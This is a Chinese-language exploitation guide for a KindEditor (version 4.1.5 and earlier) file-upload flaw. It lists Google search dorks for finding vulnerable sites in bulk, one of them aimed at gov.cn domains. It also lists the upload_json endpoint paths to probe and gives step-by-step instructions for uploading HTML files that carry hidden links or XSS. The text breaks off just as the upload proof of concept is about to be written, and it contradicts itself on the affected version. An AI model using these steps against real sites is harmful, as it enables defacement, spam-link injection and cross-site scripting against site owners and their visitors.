# kindeditor<=4.1.5上传漏洞 ## 0x00 漏洞描述 漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中 这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面,直接POST到/upload_json.*?dir=file,在允许上传的文件扩展名中包含htm,txt:extTable.Add("file","doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2") ## 0x01 批量搜索 在google中批量搜索: [](/static/baige/02-编辑器漏洞/Kindeditor/javascript:void(0);) ``` inurl:/examples/uploadbutton.html inurl:/php/upload_json.php inurl:/asp.net/upload_json.ashx inurl://jsp/upload_json.jsp inurl://asp/upload_json.asp inurl:gov.cn/kindeditor/ ``` [](/static/baige/02-编辑器漏洞/Kindeditor/javascript:void(0);) ## 0x02 漏洞问题 根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在 [](/static/baige/02-编辑器漏洞/Kindeditor/javascript:void(0);) ``` /asp/upload_json.asp /asp.net/upload_json.ashx /jsp/upload_json.jsp /php/upload_json.php ``` [](/static/baige/02-编辑器漏洞/Kindeditor/javascript:void(0);) 可目录变量查看是否存在那种脚本上传漏洞: [](/static/baige/02-编辑器漏洞/Kindeditor/javascript:void(0);) ``` kindeditor/asp/upload_json.asp?dir=file kindeditor/asp.net/upload_json.ashx?dir=file kindeditor/jsp/upload_json.jsp?dir=file kindeditor/php/upload_json.php?dir=file ``` [](/static/baige/02-编辑器漏洞/Kindeditor/javascript:void(0);) ## 0x03 漏洞利用 google搜素一些存在的站点 inurl:kindeditor 1.查看版本信息 http://www.xxx.org/kindeditor//kindeditor.js  2.版本是4.1.10可以进行尝试如下路径是否存在有必要验证文件 upload_json.* [](/static/baige/02-编辑器漏洞/Kindeditor/javascript:void(0);) ``` kindeditor/asp/upload_json.asp?dir=file kindeditor/asp.net/upload_json.ashx?dir=file kindeditor/jsp/upload_json.jsp?dir=file kindeditor/php/upload_json.php?dir=file ``` [](/static/baige/02-编辑器漏洞/Kindeditor/javascript:void(0);) 3.如下图可以看出是存在jsp上传点: http://www.xxx.org/kindeditor/jsp/upload_json.jsp?dir=file  4.写出下面的构造上传poc,这里需要修改
